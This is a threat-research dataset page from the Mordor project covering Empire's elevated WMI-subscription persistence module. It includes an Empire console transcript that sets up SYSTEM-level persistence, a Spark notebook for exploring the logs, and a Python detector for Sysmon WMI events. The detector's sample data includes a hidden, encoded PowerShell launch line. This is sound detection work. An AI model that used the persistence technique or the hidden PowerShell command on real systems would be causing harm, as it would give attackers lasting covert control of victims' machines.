Empire Elevated WMI Eventing

Metadata

| Field             | Value                                             |
|-------------------|---------------------------------------------------|
| Author            | Roberto Rodriguez @Cyb3rWard0g                    |
| Creation Date     | 2019/05/18                                        |
| Modification Date | 2020/09/20                                        |
| Tactics           | ['TA0003', 'TA0004']                              |
| Techniques        | ['T1546.003']                                     |
| Tags              | ['Local WMI Eventing', 'WMI Event Subscriptions'] |

Dataset Description

This dataset represents adversaries leveraging WMI subscriptions locally for persistence.

Notebooks

Notebooks created by the community leveraging the mordor datasets

| Author | Name | Link |
|--------|------|------|

Simulation Plan

| Environment  | Tool Type | Module |
|--------------|-----------|--------|
| Mordor shire | C2        | wmi    |

Adversary View

(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            
W2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5584   5/0.0    2020-09-04 20:42:01  http            
13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5676   5/0.0    2020-09-04 20:41:59  http            

(Empire: agents) > interact 13ZK6G7M
(Empire: 13ZK6G7M) > 
(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*
(Empire: powershell/persistence/elevated/wmi) > info

              Name: Invoke-WMI
            Module: powershell/persistence/elevated/wmi
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y
  @jbooz1

Description:
  Persist a stager (or script) using a permanent WMI
  subscription. This has a difficult detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name        Required    Value                     Description
  ----        --------    -------                   -----------
  Agent       True        13ZK6G7M                  Agent to run module on.                 
  Listener    True        http                      Listener to use.                        
  DailyTime   False                                 Daily time to trigger the script        
                                                    (HH:mm).                                
  AtStartup   False       True                      Switch. Trigger script (within 5        
                                                    minutes) of system startup.             
  FailedLogon False                                 Trigger script with a failed logon      
                                                    attempt from a specified user           
  SubName     True        Updater                   Name to use for the event subscription. 
  ExtFile     False                                 Use an external file for the payload    
                                                    instead of a stager.                    
  Cleanup     False                                 Switch. Cleanup the trigger and any     
                                                    script from specified location.         
  UserAgent   False       default                   User-agent string to use for the staging
                                                    request (default, none, or other).      
  Proxy       False       default                   Proxy to use for request (default, none,
                                                    or other).                              
  ProxyCreds  False       default                   Proxy credentials                       
                                                    ([domain\]username:password) to use for 
                                                    request (default, none, or other).      

(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT
[*] Agent 13ZK6G7M tasked with task ID 1
[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi
(Empire: powershell/persistence/elevated/wmi) > 
WMI persistence established using listener http with OnStartup WMI subsubscription trigger.

(Empire: powershell/persistence/elevated/wmi) > 
(Empire: powershell/persistence/elevated/wmi) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent PYA28EDF checked in
[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5

(Empire: powershell/persistence/elevated/wmi) > 
(Empire: powershell/persistence/elevated/wmi) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            
W2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5584   5/0.0    2020-09-04 20:43:48  http            
13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5676   5/0.0    2020-09-04 20:43:48  http            

PYA28EDF ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         7480   5/0.0    2020-09-04 20:49:29  http            

(Empire: agents) > interact PYA28EDF
(Empire: PYA28EDF) > shell whoami
[*] Tasked PYA28EDF to run TASK_SHELL
[*] Agent PYA28EDF tasked with task ID 1
(Empire: PYA28EDF) > 
nt authority\system
..Command execution completed.

(Empire: PYA28EDF) > 
(Empire: PYA28EDF) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |18003|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |17918|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |11497|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |9531 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |2785 |
|WORKSTATION5.theshire.local|security                            |5447   |2715 |
|WORKSTATION5.theshire.local|security                            |4658   |2629 |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|10     |1675 |
|WORKSTATION5.theshire.local|security                            |4656   |1361 |
|WORKSTATION5.theshire.local|security                            |4690   |1285 |
|WORKSTATION5.theshire.local|security                            |4663   |1083 |
|WORKSTATION5.theshire.local|security                            |4703   |997  |
|WORKSTATION5.theshire.local|security                            |5156   |482  |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |402  |
|WORKSTATION5.theshire.local|security                            |5158   |372  |
|WORKSTATION5.theshire.local|security                            |4673   |347  |
|MORDORDC.theshire.local    |Security                            |5156   |314  |
|WORKSTATION5.theshire.local|Windows PowerShell                  |800    |286  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|9      |270  |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |252  |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows
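The count above is a sanity check on the dataset, not a detection. The artefact the Empire module leaves behind is a permanent WMI subscription: an __EventFilter (the trigger), an event consumer (the payload) and a __FilterToConsumerBinding tying them together. Sysmon records those three objects as EventID 19, 20 and 21 when its configuration logs WMI activity; they are far too rare to show up in a top-20 count, which is why an analyst queries for them explicitly and joins them back into one subscription. The following is an added example, not part of the Mordor notebook or of Empire. It assumes the Sysmon WmiEvent field names used in the code (Name and Query for 19; Name, Type and Destination for 20; Filter and Consumer for 21), and the sample events are constructed to resemble the AtStartup subscription named Updater from the adversary view plus the SCM Event Log subscription that ships with Windows; the trigger heuristics that map the module's three options onto WQL classes are likewise an assumption.

```python
"""Correlate Sysmon WMI eventing records (EventID 19/20/21) into complete
permanent subscriptions and flag the ones that execute arbitrary content.

Added example for this page; not part of the Mordor notebook or of Empire.
Assumes Sysmon's WmiEvent fields: 19 -> Name, Query; 20 -> Name, Type,
Destination; 21 -> Filter, Consumer. Sample events below are constructed."""

import re

# Consumer classes that execute attacker-supplied content when the filter
# fires. Assumption: Sysmon reports the consumer class in 'Type' this way.
EXECUTING_CONSUMER_TYPES = {"Command Line", "Active Script"}

HOST = "WORKSTATION5.theshire.local"

# Constructed sample events, flattened like Mordor JSON rows. Index 0-2 are
# the 'Updater' AtStartup subscription; 3-5 are the benign SCM baseline.
SAMPLE_EVENTS = [
    {"EventID": 19, "Hostname": HOST, "Operation": "Created",
     "User": "NT AUTHORITY\\SYSTEM", "EventNamespace": "root\\CimV2",
     "Name": "Updater",
     "Query": ("SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
               "TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' "
               "AND TargetInstance.SystemUpTime >= 240 "
               "AND TargetInstance.SystemUpTime < 325")},
    {"EventID": 20, "Hostname": HOST, "Operation": "Created",
     "Name": "Updater", "Type": "Command Line",
     "Destination": 'CommandLineTemplate = "powershell.exe -NoP -W Hidden '
                    '-Enc <BASE64_PLACEHOLDER>"'},
    {"EventID": 21, "Hostname": HOST, "Operation": "Created",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
    {"EventID": 19, "Hostname": HOST, "Operation": "Created",
     "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Hostname": HOST, "Operation": "Created",
     "Name": "SCM Event Log Consumer", "Type": "Event Log",
     "Destination": "instance of NTEventLogEventConsumer"},
    {"EventID": 21, "Hostname": HOST, "Operation": "Created",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]


def name_from_ref(ref):
    """Turn a Sysmon 21 object reference such as
    '__EventFilter.Name="Updater"' into the bare name 'Updater'."""
    match = re.search(r'Name="([^"]*)"', ref)
    return match.group(1) if match else ref


def classify_trigger(query):
    """Heuristic guess at what the WQL filter waits for (assumption: the
    module's AtStartup/DailyTime/FailedLogon options commonly query the
    classes below)."""
    q = query.lower()
    if "systemuptime" in q:
        return "startup"
    if "win32_localtime" in q:
        return "daily-time"
    if "win32_ntlogevent" in q:
        return "event-log"
    return "unknown"


def correlate_wmi_subscriptions(events):
    """Join EventID 19/20/21 on subscription names; one finding per binding.
    A binding whose filter or consumer creation was never observed (e.g.
    Sysmon started later) is flagged rather than silently dropped."""
    filters = {e["Name"]: e for e in events if int(e["EventID"]) == 19}
    consumers = {e["Name"]: e for e in events if int(e["EventID"]) == 20}
    findings = []
    for binding in (e for e in events if int(e["EventID"]) == 21):
        fname = name_from_ref(binding["Filter"])
        cname = name_from_ref(binding["Consumer"])
        flt, con = filters.get(fname), consumers.get(cname)
        flags = []
        if flt is None:
            flags.append("filter creation not observed")
        if con is None:
            flags.append("consumer creation not observed")
        ctype = con["Type"] if con else "unknown"
        if ctype in EXECUTING_CONSUMER_TYPES:
            flags.append(f"executing consumer ({ctype})")
        if con and "powershell" in con.get("Destination", "").lower():
            flags.append("consumer launches powershell")
        findings.append({
            "host": binding.get("Hostname"),
            "filter": fname,
            "consumer": cname,
            "consumer_type": ctype,
            "trigger": classify_trigger(flt["Query"]) if flt else "unknown",
            "flags": flags,
            "suspicious": bool(flags),   # anything unexplained gets reviewed
        })
    return findings


if __name__ == "__main__":
    for finding in correlate_wmi_subscriptions(SAMPLE_EVENTS):
        print(finding)
```

Against the real dataset the same join is a Spark SQL query over mordorTable filtered on Channel = 'Microsoft-Windows-Sysmon/Operational' and EventID IN (19, 20, 21); the Python above is the logic you would express there, kept offline so it runs on the constructed rows. Note that the SCM baseline scores clean only because its consumer type is Event Log; a second, unexplained command-line consumer bound to a startup filter is the pattern that the Empire run on this page produced.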